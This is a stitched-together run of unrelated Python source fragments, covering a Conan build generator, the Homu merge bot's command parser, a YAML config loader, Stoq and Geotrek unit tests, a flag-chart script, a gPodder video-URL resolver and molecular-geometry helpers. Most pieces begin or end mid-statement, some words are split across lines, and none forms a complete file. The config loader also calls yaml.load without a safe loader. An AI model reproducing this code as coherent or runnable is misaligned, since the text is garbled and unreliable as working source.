reprocessorDefinitions>$(ConanPreprocessorDefinitions)%(PreprocessorDefinitions)</PreprocessorDefinitions> <AdditionalOptions>$(ConanCompilerFlags) %(AdditionalOptions)</AdditionalOptions> </ClCompile> <Link> <AdditionalLibraryDirectories>$(ConanLibraryDirectories)%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories> <AdditionalDependencies>$(ConanLibraries)%(AdditionalDependencies)</AdditionalDependencies> <AdditionalDependencies>$(ConanSystemDeps)%(AdditionalDependencies)</AdditionalDependencies> <AdditionalOptions>$(ConanLinkerFlags) %(AdditionalOptions)</AdditionalOptions> </Link> <Midl> <AdditionalIncludeDirectories>$(ConanIncludeDirectories)%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories> </Midl> <ResourceCompile> <AdditionalIncludeDirectories>$(ConanIncludeDirectories)%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories> <PreprocessorDefinitions>$(ConanPreprocessorDefinitions)%(PreprocessorDefinitions)</PreprocessorDefinitions> <AdditionalOptions>$(ConanCompilerFlags) %(AdditionalOptions)</AdditionalOptions> </ResourceCompile> </ItemDefinitionGroup>''' item_template = ''' <Conan-{name}-Root>{root_dir}</Conan-{name}-Root>''' def _format_items(self): sections = [] for dep_name, cpp_info in self._deps_build_info.dependencies: fields = { 'root_dir': cpp_info.rootpath, 'name': dep_name.replace(".", "-") } section = self.item_template.format(**fields) sections.append(section) return "".join(sections) @property def filename(self): return BUILD_INFO_VISUAL_STUDIO def _format_properties(self, build_info, condition): def has_valid_ext(lib): ext = os.path.splitext(lib)[1] return ext in VALID_LIB_EXTENSIONS fields = { 'conan_package_name': self.conanfile.name if self.conanfile.name else "", 'conan_package_version': self.conanfile.version if self.conanfile.version else "", 'condition': condition, 'bin_dirs': "".join("%s;" % p for p in build_info.bin_paths), 'res_dirs': "".join("%s;" % p for p in build_info.res_paths), 'include_dirs': "".join("%s;" % p for p in build_info.include_paths), 'lib_dirs': "".join("%s;" % p for p in build_info.lib_paths), 'libs': "".join(['%s.lib;' % lib if not has_valid_ext(lib) else '%s;' % lib for lib in build_info.libs]), 'system_libs': "".join(['%s.lib;' % sys_dep if not has_valid_ext(sys_dep) else '%s;' % sys_dep for sys_dep in build_info.system_libs]), 'definitions': "".join("%s;" % d for d in build_info.defines), 'compiler_flags': " ".join(build_info.cxxflags + build_info.cflags), 'linker_flags': " ".join(build_info.sharedlinkflags), 'exe_flags': " ".join(build_info.exelinkflags) } formatted_template = self.properties_template.format(**fields) return formatted_template @property def content(self): per_item_props = self._format_items() properties = [self._format_properties(self._deps_build_info, condition='')] for config, cpp_info in self._deps_build_info.configs.items(): condition = " Condition=\"'$(Configuration)' == '%s'\"" % config properties.append(self._format_properties(cpp_info, condition=condition)) fields = { 'item_properties': per_item_props, 'properties': '\n'.join(properties) } formatted_template = self.template.format(**fields) userprofile = os.getenv("USERPROFILE") if userprofile: userprofile = userprofile.replace("\\", "\\\\") formatted_template = re.sub(userprofile, "$(USERPROFILE)", formatted_template, flags=re.I) return formatted_template
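# The generator above renders an MSBuild property sheet (BUILD_INFO_VISUAL_STUDIO)
# from the aggregated cpp_info of the dependency graph. The recipe below is a
# hedged sketch of how a consumer would opt in under Conan 1.x; the zlib reference
# is purely illustrative.
from conans import ConanFile


class ConsumerConan(ConanFile):
    settings = "os", "compiler", "build_type", "arch"
    requires = "zlib/1.2.11"          # illustrative dependency
    generators = "visual_studio"      # emits the property sheet rendered above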
'url': url, } db_query(self.db, 'INSERT OR REPLACE INTO build_res (repo, num, builder, res, url, merge_sha) VALUES (?, ?, ?, ?, ?, ?)', [ self.repo_label, self.num, builder, res, url, self.merge_sha, ]) def build_res_summary(self): return ', '.join('{}: {}'.format(builder, data['res']) for builder, data in self.build_res.items()) def get_repo(self): repo = self.repos[self.repo_label] if not repo: self.repos[self.repo_label] = repo = self.gh.repository(self.owner, self.name) assert repo.owner.login == self.owner assert repo.name == self.name return repo def save(self): db_query(self.db, 'INSERT OR REPLACE INTO pull (repo, num, status, merge_sha, title, body, head_sha, head_ref, base_ref, assignee, approved_by, priority, try_, rollup, delegate) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)', [ self.repo_label, self.num, self.status, self.merge_sha, self.title, self.body, self.head_sha, self.head_ref, self.base_ref, self.assignee, self.approved_by, self.priority, self.try_, self.rollup, self.delegate, ]) def refresh(self): issue = self.get_repo().issue(self.num) self.title = issue.title self.body = issue.body def fake_merge(self, repo_cfg): if repo_cfg.get('linear', False) or repo_cfg.get('autosquash', False): msg = '''!!! Temporary commit !!! This commit is artifically made up to mark PR {} as merged. If this c
ommit remained in the history, you can safely reset HEAD to {}. This is possibly due to protected branches, which forbids force-pushing. You are advised
to turn off protected branches, or disable certain Homu features that require force-pushing, such as linear history or auto-squashing. [ci skip]'''.format(self.num, self.merge_sha) def inner(): # `merge()` will return `None` if the `head_sha` commit is already part of the `base_ref` branch, which means rebasing didn't have to modify the original commit merge_commit = self.get_repo().merge(self.base_ref, self.head_sha, msg) if merge_commit: self.fake_merge_sha = merge_commit.sha def fail(err): self.add_comment(':warning: Unable to mark this PR as merged. Closing instead. ({})'.format(err)) self.get_issue().close() utils.retry_until(inner, fail, self) def sha_cmp(short, full): return len(short) >= 4 and short == full[:len(short)] def sha_or_blank(sha): return sha if re.match(r'^[0-9a-f]+$', sha) else '' def parse_commands(body, username, repo_cfg, state, my_username, db, states, *, realtime=False, sha=''): try_only = False if username not in repo_cfg['reviewers'] and username != my_username: if username.lower() == state.delegate.lower(): pass # Allow users who have been delegated review powers elif username in repo_cfg.get('try_users', []): try_only = True else: return False state_changed = False words = list(chain.from_iterable(re.findall(r'\S+', x) for x in body.splitlines() if '@' + my_username in x)) for i, word in reversed(list(enumerate(words))): found = True if word == 'r+' or word.startswith('r='): if try_only: if realtime: state.add_comment(':key: Insufficient privileges') continue if not sha and i+1 < len(words): cur_sha = sha_or_blank(words[i+1]) else: cur_sha = sha approver = word[len('r='):] if word.startswith('r=') else username # Ignore "r=me" if approver == 'me': continue # Sometimes, GitHub sends the head SHA of a PR as 0000000 through the webhook. This is # called a "null commit", and seems to happen when GitHub internally encounters a race # condition. Last time, it happened when squashing commits in a PR. In this case, we # just try to retrieve the head SHA manually. if all(x == '0' for x in state.head_sha): if realtime: state.add_comment(':bangbang: Invalid head SHA found, retrying: `{}`'.format(state.head_sha)) state.head_sha = state.get_repo().pull_request(state.num).head.sha state.save() assert any(x != '0' for x in state.head_sha) if state.approved_by and realtime and username != my_username: for _state in states[state.repo_label].values(): if _state.status == 'pending': break else: _state = None lines = [] if state.status in ['failure', 'error']: lines.append('- This pull request previously failed. You should add more commits to fix the bug, or use `retry` to trigger a build again.') if _state: if state == _state: lines.append('- This pull request is currently being tested. 
If there\'s no response from the continuous integration service, you may use `retry` to trigger a build again.') else: lines.append('- There\'s another pull request that is currently being tested, blocking this pull request: #{}'.format(_state.num)) if lines: lines.insert(0, '') lines.insert(0, ':bulb: This pull request was already approved, no need to approve it again.') state.add_comment('\n'.join(lines)) if sha_cmp(cur_sha, state.head_sha): state.approved_by = approver state.save() elif realtime and username != my_username: if cur_sha: msg = '`{}` is not a valid commit SHA.'.format(cur_sha) state.add_comment(':scream_cat: {} Please try again with `{:.7}`.'.format(msg, state.head_sha)) else: state.add_comment(':pushpin: Commit {:.7} has been approved by `{}`\n\n<!-- @{} r={} {} -->'.format(state.head_sha, approver, my_username, approver, state.head_sha)) elif word == 'r-': if try_only: if realtime: state.add_comment(':key: Insufficient privileges') continue state.approved_by = '' state.save() elif word.startswith('p='): try: state.priority = int(word[len('p='):]) except ValueError: pass state.save() elif word.startswith('delegate='): if try_only: if realtime: state.add_comment(':key: Insufficient privileges') continue state.delegate = word[len('delegate='):] state.save() if realtime: state.add_comment(':v: @{} can now approve this pull request'.format(state.delegate)) elif word == 'delegate-': state.delegate = '' state.save() elif word == 'delegate+': if try_only: if realtime: state.add_comment(':key: Insufficient privileges') continue state.delegate = state.get_repo().pull_request(state.num).user.login state.save() if realtime: state.add_comment(':v: @{} can now approve this pull request'.format(state.delegate)) elif word == 'retry' and realtime: state.set_status('') elif word in ['try', 'try-'] and realtime: state.try_ = word == 'try' state.merge_sha = '' state.init_build_res([]) state.save() elif word in ['rollup', 'rollup-']: state.rollup = word == 'rollup' state.save() elif
__author__ = 'Fabrizio Lungo<fab@lungo.co.uk>' import os import yaml from __exceptions__.FileNotFound import FileNotFound from section import ConfigurationSection class Configuration(ConfigurationSection): def __init__(self, fn='config.yml', name=None, crea
te=False): self._fn = fn self._create = create self.reload() if name is None: name=fn self._name = name def reload(self): if self._create and not os.path.exists(self._fn): self._config = {} elif os.path.exists(self._fn): with open(self._fn, "r") as f: self._config = yaml.load(f) else:
raise FileNotFound(filename=self._fn) def save(self): with open(self._fn, "w") as f: yaml.dump(self._config, f)
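# A minimal usage sketch for the Configuration wrapper above, limited to what this
# file shows (the fn/name/create constructor arguments, reload() and save());
# reading individual values goes through ConfigurationSection, defined elsewhere.
if __name__ == '__main__':
    cfg = Configuration(fn='config.yml', name='example', create=True)
    # With create=True a missing file simply starts from an empty mapping,
    # and save() writes the current state back out as YAML.
    cfg.save()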
cla
ss Solution(object): def missingNumber(self, nums):
""" :type nums: List[int] :rtype: int """ xor = len(nums) for i, n in enumerate(nums): xor ^= n xor ^= i return xor inputs = [ [0], [1], [3,0,1], [9,6,4,2,3,5,7,0,1] ] s = Solution() for i in inputs: print s.missingNumber(i)
eek, NextWeek, ThisMonth, LastMonth, NextMonth) from stoqlib.gui.test.uitestutils import GUITest from stoqlib.lib.defaults import get_weekday_start from stoqlib.lib.introspection import get_all_classes class TestDateOptions(unittest.TestCase): def setUp(self): self._original_locale = locale.getlocale(locale.LC_ALL) def tearDown(self): self._set_locale(self._original_locale) def _get_week_interval(self, today): weekday = get_weekday_start() start = today + delta(weekday=weekday(-1)) end = start + delta(days=+6) return start, end def _get_month_interval(self, today): start = today + delta(day=1) end = start + delta(day=31) return start, end def _get_locales(self): # en_US: week starts on sunday # es_ES: week starts on monday return ["en_US.UTF-8", "es_ES.UTF-8"] def _starts_on_sunday(self, loc): return loc.startswith("en_US") def _set_locale(self, loc): try: loc = locale.setlocale(locale.LC_ALL, loc) except locale.Error: # Some locales could not be available on user's machine, leading # him to a false positive broke test, so skip it, informing the # problem. raise unittest.SkipTest("Locale %s not available" % (loc, )) else: os.environ['LC_ALL'] = loc def _testWeekday(self, loc, interval): if self._starts_on_sunday(loc): self.assertEqual( relativedelta.weekday(interval[0].weekday()), SU) self.assertEqual( relativedelta.weekday(interval[1].weekday()), SA) else: self.assertEqual( relativedelta.weekday(interval[0].weekday()), MO) self.assertEqual( relativedelta.weekday(interval[1].weekday()), SU) def test_this_week(self): option = ThisWeek() for loc in self._get_locales(): self._set_locale(loc) # starting in 2008/01/01, wednesday for i in range(1, 8): get_today_date = lambda: datetime.date(2008, 1, i) option.get_today_date = get_today_date self.assertEqual(option.get_interval(), self._get_week_interval(get_today_date())) self._testWeekday(loc, option.get_interval()) def test_last_week(self): option = LastWeek() for loc in self._get_locales(): self._set_locale(loc) # starting in 2008/01/01, wednesday for i in range(1, 8): get_today_date = lambda: datetime.date(2008, 1, i) option.get_today_date = get_today_date last_week_day = get_today_date() + delta(weeks=-1) self.assertEqual(option.get_interval(), self._get_week_interval(last_week_day)) self._testWeekday(loc, option.get_interval()) def test_next_week(self): option = NextWeek() for loc in self._get_locales(): self._set_locale(loc) # starting in 2008/01/01, wednesday for i in range(1, 8): get_today_date = lambda: datetime.date(2008, 1, i) option.get_today_date = get_today_date next_week_day = get_today_date() + delta(weeks=+1) self.assertEqual(option.get_interval(), self._get_week_interval(next_week_day)) self._testWeekday(loc, option.get_interval()) def test_this_month(self): option = ThisMonth() for loc in self._get_locales(): self._set_locale(loc) for month_day in [datetime.date(2007, 1, 1), datetime.date(2007, 1, 15), datetime.date(2007, 1, 31)]: option.get_today_date = lambda: month_day self.assertEqual(option.get_interval(), self._get_month_interval(month_day)) def test_last_month(self): option = LastMonth() for loc in self._get_locales(): self._set_locale(loc) for month_day in [datetime.date(2007, 1, 1), datetime.date(2007, 1, 15), datetime.date(2007, 1, 31)]: option.get_today_date = lambda: month_day last_month_day = month_day + delta(months=-1) self.assertEqual(option.get_interval(), self._get_month_interval(last_month_day)) def test_next_month(self): option = NextMonth() for loc in self._get_locales(): self._set_locale(loc) for 
month_day in [datetime.date(2007, 1, 1), datetime.date(2007, 1, 15), datetime.date(2007, 1, 31)]: option.get_today_date = lambda: month_day next_month_day = month_day + delta(months=+1) self.assertEqual(option.get_interval(), self._get_month_interval(next_month_day)) class TestSearchEditor(GUITest): """Tests for SearchEditor""" @mock.patch('stoqlib.gui.search.searcheditor.api.new_store') @mock.patch('stoqlib.gui.search.searcheditor.run_dialog') def test_run_editor(self, run_dialog, new_store): run_dialog.return_value = True new_store.return_value = self.store dialog = ProductSearch(store=self.store) dialog.search.refresh() dialog.results.select(dialog.results[0]) product = dialog.results[0].product with mock.patch.object(self.store, 'commit'): with mock.patch.object(self.store, 'close'): self.click(dialog._toolbar.edit_button) run_dialog.assert_called_once_with(ProductEditor, dialog, self.store, product, visual_mode=False) class TestSearchEvent(GUITest): def test_search_dialog_setup_search(self): class ProductSearchExtention(SearchExtension): spec_attributes = dict(ncm=Product.ncm) def get_columns(self): return [SearchColumn('ncm', title='NCM', data_type=str)] def _setup_search(dialog): return dialog.add_extension(ProductSearchExtention()) # At leat one product should have a NCM value, so we can verify the # results. product = self.store.find(Product).order_by(Product.te_id).first() product.ncm = u'12345678' SearchDialogSetupSearchEvent.connect(_setup_search) dialog = ProductSearch(self.store) dialog.search.refresh() self.check_search(dialog, 'product-search-extended') class TestQuantityColumn(GUITest): def test_format_func(self): class Fake(object): quantity = 0 column = QuantityColumn('quantity') obj = Fake() obj.quantity = None self.assertEquals(column._format_func(obj, True), '0') obj.quantity = 0 self.assertEquals(column._format_func(obj, True), '0') obj.quantity = 1 self.assertEquals(column._format_func(obj, True), '1') obj.product = self.create_product() obj.sellable = obj.product.sellable # Without a unit, it should still return just the number obj.quantity = 1 self.assertEquals(column._format_func(obj, True), '1') obj.sellable.unit = self.create_sellable_unit(u'Pc') self.assertEquals(column._format_func(obj, True), '1 Pc') obj.product.manage_stock = False self.assertEquals(column._format_func(obj, True), '1 Pc') obj.quantity = 0
self.assertEquals(column._format_func(obj, True), u"\u221E") class TestSearchGeneric(DomainTest): """Generic tests for searches""" # Those are base classes for other s
earches, and should not be instantiated ignored_classes = [
# -*- coding: utf-8 -*- """ Production settings file for project 'project' """ from project.settings import * DEBUG = False SITE_DOMAIN = 'sveetch.github.io/Sveetoy' # Directory where all stuff will be builded PUBLISH_DIR = os.path.join(PROJECT_DIR, '../docs') # Path where will be moved all the static files, usually this is a directory in # the ``PUBLISH_DIR`` STATIC_DIR = os.path.join(PROJECT_DIR, PUBLISH_DIR, 'static'
)
from pudzu.charts import * df = pd.read_csv("datasets/flagstriband.csv") df = pd.concat([pd.DataFrame(df.colours.apply(list).tolist(), columns=list("TMB")), df], axis=1).set_index("colours") FONT, SIZE = calibri, 24 fg, bg = "black", "#EEEEEE" default_img = "https://s-media-cache-ak0.pinimg.com/736x/0d/36/e7/0d36e7a476b06333d9fe9960572b66b9.jpg" COLORS = { "W": "white", "Y": "yellow", "R": "red", "G": "green", "B": "blue", "K": "black", } W, H = 320, 200 def label(c, size): w, h = size label = Image.from_text_bounded(" ", (W,H), SIZE, partial(FONT, bold=True), beard_line=True) description = Image.from_text_bounded(" ", (W,H), SIZE, partial(FONT, italics=True), beard_line=True) if c == "Y": flag = Triangle(max(w,h), "orange", "yellow", p=1.0).crop_to_aspect(w,h).trim(1).pad(1, "grey") else: flag = Rectangle((w-2, h-2), RGBA(COLORS.get(c)).blend(bg, 0.1)).pad(1, "grey") return Image.from_column([label, description, flag], padding=2, bg=bg) def process(d): if non(d['name']): return None label = Image.from_text_bounded(d['name'].replace("*","").upper(), (W,H), SIZE, partial(FONT, bold=True), beard_line=True) description = Image.from_text_bounded(get_non(d, 'description', " "), (W,H), SIZE, partial(FONT, italics=True), beard_line=True) flag = Image.from_url_with_cache(get_non(d, 'flag', default_img)).to_rgba() flag = flag.resize_fixed_aspect(height=H-2) if flag.width / flag.height < 1.3 else flag.resize((W-2,H-2)) flag = flag.pad(1, "grey") flaglabel = Image.from_column([label, description, flag], padding=2, bg=bg) if "*" in d['name']: flaglabel = flaglabel.blend(Rectangle(flaglabel.
size, bg), 0.3) return flaglabel def grid(middle): ms = df[df.M == middle] colors = "".join(COLORS).replace(middle,"") array = [[dict(ms.loc[b+middle+t][["name", "description", "flag"]]) for b in colors] for t in colors] data = pd.DataFrame(array, index=list(colors), columns=list(colors)) grid = grid_chart(data, process, padding=(10,20), fg=fg, bg=bg, yalign=1, row
_label=lambda row: label(data.index[row], (100, H)), col_label=lambda col: label(data.columns[col], (W,100)), corner_label=label(middle, (100,100))) return grid PAD = 100 grids = list(generate_batches([grid(c) for c in COLORS], 2)) grid = Image.from_array(grids, padding=(PAD,PAD//2), bg=bg) title = Image.from_column([ Image.from_text_bounded("From Austria to Zanzibar".upper(), grid.size, 360, partial(FONT, bold=True), fg=fg, bg=bg, padding=(PAD,20)), Image.from_text_bounded("a catalog of horizontal triband flags".upper(), grid.size, 240, partial(FONT, bold=True), fg=fg, bg=bg, padding=(PAD,20)), ], padding=0) img = Image.from_column([title, grid], bg=bg, padding=(20,0)).pad(10, bg) img.place(Image.from_text("/u/Udzu", FONT(48), fg=fg, bg=bg, padding=10).pad((2,2,0,0), fg), align=1, padding=10, copy=False) img.save("output/flagstriband.png") img.resize_fixed_aspect(scale=0.5).save("output/flagstriband2.png")
# -*- coding: utf-8 -*- # # gPodder - A media aggregator and podcast client # Copyright (c) 2005-2014 Thomas Perl and the gPodder Team # # gPodder is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 3 of the License, or # (at your option) any later version. # # gPodder is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # # # gpodder.escapist - Escapist Videos download magic # somini <somini29@yandex.com>; 2014-09-14 # import gpodder from gpodder import util import logging logger = logging.getLogger(__name__) try: # For Python < 2.6, we use the "simplejson" add-on module import simplejson as json except ImportError: # Python 2.6 already ships with a nice "json" module import json import re # This matches the more reliable URL ESCAPIST_NUMBER_RE = re.compile(r'http://www.escapistmagazine.com/videos/view/(\d+)', re.IGNORECASE) # This matches regular URL, mainly those that come in the RSS feeds ESCAPIST_REGULAR_RE = re.compile(r'http://www.escapistmagazine.com/videos/view/([\w-]+)/(\d+)-', re.IGNORECASE) # This finds the RSS for a given URL DATA_RSS_RE = re.compile(r'http://www.escapistmagazine.com/rss/video
s/list/([1-9][0-9]*)\.xml') # This matches the flash player's configuration. It's a JSON, but it's always malformed DATA_CONFIG_RE = re.compile(r'flashvars=.*config=(http.*\.js)', re.IGNORECASE) # This matches the actual MP4 url, inside the "JSON" DATA_CONFIG_DATA_RE = re.compile(r'http[:/\w.?&-]*\.mp4') # This matches the cover art for an RSS. We shouldn't parse XML with regex. DATA_COVERART_RE = re.compi
le(r'<url>(http:.+\.jpg)</url>') class EscapistError(BaseException): pass def get_real_download_url(url): video_id = get_escapist_id(url) if video_id is None: return url web_data = get_escapist_web(video_id) data_config_frag = DATA_CONFIG_RE.search(web_data) if data_config_frag is None: raise EscapistError('Cannot get flashvars URL from The Escapist') data_config_url = data_config_frag.group(1) logger.debug('Config URL: %s', data_config_url) data_config_data = util.urlopen(data_config_url).read().decode('utf-8') data_config_data_frag = DATA_CONFIG_DATA_RE.search(data_config_data) if data_config_data_frag is None: raise EscapistError('Cannot get configuration JS from The Escapist') real_url = data_config_data_frag.group(0) if real_url is None: raise EscapistError('Cannot get MP4 URL from The Escapist') elif "-ad-rotation/" in real_url: raise EscapistError('Oops, seems The Escapist blocked this IP. Wait a few days/weeks to get it unblocked') else: return real_url def get_escapist_id(url): result = ESCAPIST_NUMBER_RE.match(url) if result is not None: return result.group(1) result = ESCAPIST_REGULAR_RE.match(url) if result is not None: return result.group(2) return None def is_video_link(url): return (get_escapist_id(url) is not None) def get_real_channel_url(url): video_id = get_escapist_id(url) if video_id is None: return url web_data = get_escapist_web(video_id) data_config_frag = DATA_RSS_RE.search(web_data) if data_config_frag is None: raise EscapistError('Cannot get RSS URL from The Escapist') return data_config_frag.group(0) def get_real_cover(url): rss_url = get_real_channel_url(url) if rss_url is None: return None rss_data = util.urlopen(rss_url).read() rss_data_frag = DATA_COVERART_RE.search(rss_data) if rss_data_frag is None: return None return rss_data_frag.group(1) def get_escapist_web(video_id): if video_id is None: return None web_url = 'http://www.escapistmagazine.com/videos/view/%s' % video_id return util.urlopen(web_url).read()
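# A small illustrative check of the URL helpers above: both the "reliable" numeric
# form and the regular RSS-style form documented by the regexes should yield the
# same id. The video id 6098 and the slug are made-up example values.
if __name__ == '__main__':
    assert get_escapist_id('http://www.escapistmagazine.com/videos/view/6098') == '6098'
    assert get_escapist_id('http://www.escapistmagazine.com/videos/view/zero-punctuation/6098-example') == '6098'
    assert not is_video_link('http://example.com/videos/view/6098')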
(isinstance(res, AtomGroup)) (AAN_part, res_part) = self._match_residues(AAN['2'], res) # for NME if next_aa is not None: if next_aa.has_atom('C'): AAN_part.set_atom('C2', AAN['1']['C']) res_part.set_atom('C2', next_aa['C']) if next_aa.has_atom('O'): AAN_part.set_atom('O2', AAN['1']['O']) res_part.set_atom('O2', next_aa['O']) if next_aa.has_atom('CA'): AAN_part.set_atom('CH3', AAN['1']['CH3']) res_part.set_atom('CH3', next_aa['CA']) sp = Superposer(AAN_part, res_part) rmsd = sp.rmsd matched_AAN = sp.superimpose(AAN) return (matched_AAN, rmsd) def _match_residues(self, res1, res2, max_number_of_atoms=-1): """ Match the N, H, CA, HA, C and O atoms of two amino-acid residues. If a residue is a proline, its CD carbon is treated as the H. GLY has HA1 and HA2, so HA is not matched. """ atom_names = ['CA', 'O', 'C', 'N', 'CB', 'HA'] if max_number_of_atoms == -1: max_number_of_atoms = len(atom_names) ans_res1 = AtomGroup() ans_res2 = AtomGroup() for atom_name in atom_names: pickup_atoms1 = res1.pickup_atoms(atom_name) if len(pickup_atoms1) > 0: pickup_atoms2 = res2.pickup_atoms(atom_name) if len(pickup_atoms2) > 0: ans_res1.set_atom(atom_name, pickup_atoms1[0]) ans_res2.set_atom(atom_name, pickup_atoms2[0]) if ans_res1.get_number_of_atoms() >= max_number_of_atoms: break # match amino-'H' if ans_res1.get_number_of_atoms() < max_number_of_atoms: res1_H = None res2_H = None if res1.has_atom('H'): res1_H = res1['H'] elif res1.has_atom('CD'): # for proline res1_H = res1['CD'] if res2.has_atom('H'): res2_H = res2['H'] elif res2.has_atom('CD'): res2_H = res2['CD'] if ((res1_H is not None) and (res2_H is not None)): ans_res1.set_atom('H', res1_H) ans_res2.set_atom('H', res2_H) return (ans_res1, ans_res2) # ----------------------------------------------------------------- def add_methyl(self, C1, C2): """ Add the hydrogens of a -CH3 group; the hydrogen atoms are attached to C1. """ assert(isinstance(C1, Atom)) assert(isinstance(C2, Atom)) ethane = AtomGroup() ethane.set_atom('C1', Atom(symbol='C', name='C1', position=Position(0.00000, 0.00000, 0.00000))) ethane.set_atom('H11', Atom(symbol='H', name='H11', position=Position(-0.85617, -0.58901, -0.35051))) ethane.set_atom('H12', Atom(symbol='H', name='H12', position=Position(-0.08202, 1.03597, -0.35051))) ethane.set_atom('H13', Atom(symbol='H', name='H13',
position=Position(0.93818, -0.44696, -0.35051))) ethane.set_atom('C2', Atom(symbol='C', name='C2', position=Position(0.00000, 0.00000, 1.47685))) ethane.set_atom('H21', Atom(symbol='H', name='H21', position=Positi
on(-0.93818, 0.44696, 1.82736))) ethane.set_atom('H22', Atom(symbol='H', name='H22', position=Position(0.85617, 0.58901, 1.82736))) ethane.set_atom('H23', Atom(symbol='H', name='H23', position=Position(0.08202, -1.03597, 1.82736))) inC21 = C2.xyz - C1.xyz refC21 = ethane['C2'].xyz - ethane['C1'].xyz shift = C1.xyz - ethane['C1'].xyz rot = self.arbitary_rotate_matrix(inC21, refC21) ethane.rotate(rot) ethane.shift_by(shift) assert(C1.xyz == ethane['C1'].xyz) answer = AtomGroup() answer.set_atom('H11', ethane['H11']) answer.set_atom('H12', ethane['H12']) answer.set_atom('H13', ethane['H13']) return answer # ----------------------------------------------------------------- def get_NH3(self, angle=0.5 * math.pi, length=1.0): pi23 = math.pi * 2.0 / 3.0 # (pi * 2/3) sin23 = math.sin(pi23) cos23 = math.cos(pi23) # pi43 = math.pi * 4.0 / 3.0 # (pi * 4/3) # sin43 = math.sin(pi43) # cos43 = math.cos(pi43) sin_input = math.sin(angle) cos_input = math.cos(angle) # rotate 120 degrees about the z axis # z1_rot = Matrix(3, 3) # z1_rot.set(0, 0, cos23) # z1_rot.set(0, 1, -sin23) # z1_rot.set(1, 0, sin23) # z1_rot.set(1, 1, cos23) # z1_rot.set(2, 2, 1.0) # rotate 240 degrees about the z axis # z2_rot = Matrix(3, 3) # z2_rot.set(0, 0, cos43) # z2_rot.set(0, 1, -sin43) # z2_rot.set(1, 0, sin43) # z2_rot.set(1, 1, cos43) # z2_rot.set(2, 2, 1.0) # rotate about the y axis # y_rot = Matrix(3, 3) # y_rot.set(0, 0, cos_input) # y_rot.set(0, 2, -sin_input) # y_rot.set(2, 0, sin_input) # y_rot.set(2, 2, cos_input) # y_rot.set(1, 1, 1.0) # pos_H1 = Position(1.0, 0.0, 0.0) # pos_H1.rotate(y_rot) # pos_H1 *= length # pos_H2 = Position(1.0, 0.0, 0.0) # pos_H2.rotate(y_rot) # pos_H2.rotate(z1_rot) # pos_H2 *= length # pos_H3 = Position(1.0, 0.0, 0.0) # pos_H3.rotate(y_rot) # pos_H3.rotate(z2_rot) # pos_H3 *= length # in the X-Z plane, open by `angle` relative to the Y axis xz_rot = Matrix(3, 3) xz_rot.set(0, 0, cos_input) xz_rot.set(0, 2, -sin_input) xz_rot.set(2, 0, sin_input) xz_rot.set(2, 2, cos_input) xz_rot.set(1, 1, 1.0) # in the X-Y plane, open by 120 degrees relative to the Z axis xy_rot = Matrix(3, 3) xy_rot.set(0, 0, cos23) xy_rot.set(0, 1, -sin23) xy_rot.set(1, 0, sin23) xy_rot.set(1, 1, cos23) xy_rot.set(2, 2, 1.0) pos_H1 = Position(0.0, 0.0, 1.0) pos_H1.rotate(xz_rot) pos_H2 = Position(0.0, 0.0, 1.0) pos_H2.rotate(xz_rot) pos_H2.rotate(xy_rot) pos_H3 = Position(0.0, 0.0, 1.0) pos_H3.rotate(xz_rot) pos_H3.rotate(xy_rot) pos_H3.rotate(xy_rot) pos_H1 *= length pos_H2 *= length pos_H3 *= length NH3 = AtomGroup() N = Atom(symbol='N', position=Position(0.0, 0.0, 0.0)) H1 = Atom(symbol='H', position=pos_H1) H2 = Atom(symbol='H', position=pos_H2) H3 = Atom(symbol='H', position=pos_H3) # X1 = Atom(symbol = 'X', # position = Position(1.0, 0.0, 0.0)) # X2 = Atom(symbol = 'X', # position = Position(0.0, 1.0, 0.0)) # X3 = Atom(symbol = 'X', # position = Position(0.0, 0.0, 1.0)) NH3.set_atom('N', N) NH3.set_atom('H1', H1) NH3.set_atom('H2', H2) NH3.set_atom('H3', H3) # NH3.set_atom('X1', X1) # NH3.set_atom('X2', X2) # NH3.set_atom('X3', X3) return NH3 # ----------------------------------------------------------------- def select_residues(self, chain, from_resid, to_resid): ''' Return the consecutive amino-acid residues in the given id range ''' answer = AtomGroup() for resid, res in chain.groups(): resid = int(resid) if from_resid <= resid <= to_resid: answer |= res return answer # ----------------------------------------------------------------- def arbitary_rotate_matrix(self, in_a, in_b): """ Return the (3x3) rotation matrix that aligns vector a with vector b """ assert(isinstance(in_a, Position)) assert(isinstance(in_b, Position)) a = Position(in_a) b = Position(in_b) a.norm() b.norm() cos_theta = a.dot(b) sin_theta = math.sqrt(1 - cos_theta * 
cos_theta) n = a.cross
self.assertCountEqual(trek.services, []) @skipIf(not settings.TREKKING_TOPOLOGY_ENABLED, 'Test with dynamic segmentation only') def test_deleted_pois(self): p1 = PathFactory.create(geom=LineString((0, 0), (4, 4))) trek = TrekFactory.create(paths=[p1]) poi = POIFactory.create(paths=[(p1, 0.6, 0.6)]) self.assertCountEqual(trek.pois, [poi]) poi.delete() self.assertCountEqual(trek.pois, []) @skipIf(not settings.TREKKING_TOPOLOGY_ENABLED, 'Test with dynamic segmentation only') def test_deleted_services(self): p1 = PathFactory.create(geom=LineString((0, 0), (4, 4))) trek = TrekFactory.create(paths=[p1]) service = ServiceFactory.create(paths=[(p1, 0.6, 0.6)]) service.type.practices.add(trek.practice) self.assertCountEqual(trek.services, [service]) service.delete() self.assertCountEqual(trek.services, []) @skipIf(not settings.TREKKING_TOPOLOGY_ENABLED, 'Test with dynamic segmentation only') def test_pois_should_be_ordered_by_progression(self): p1 = PathFactory.create(geom=LineString((0, 0), (4, 4))) p2 = PathFactory.create(geom=LineString((4, 4), (8, 8))) self.trek = TrekFactory.create(paths=[p1, p2]) self.trek_reverse = TrekFactory.create(paths=[(p2, 0.8, 0), (p1, 1, 0.2)]) self.poi1 = POIFactory.create(paths=[(p1, 0.8, 0.8)]) self.poi2 = POIFactory.create(paths=[(p1, 0.3, 0.3)]) self.poi3 = POIFactory.create(paths=[(p2, 0.5, 0.5)]) pois = self.trek.pois self.assertEqual([self.poi2, self.poi1, self.poi3], list(pois)) pois = self.trek_reverse.pois 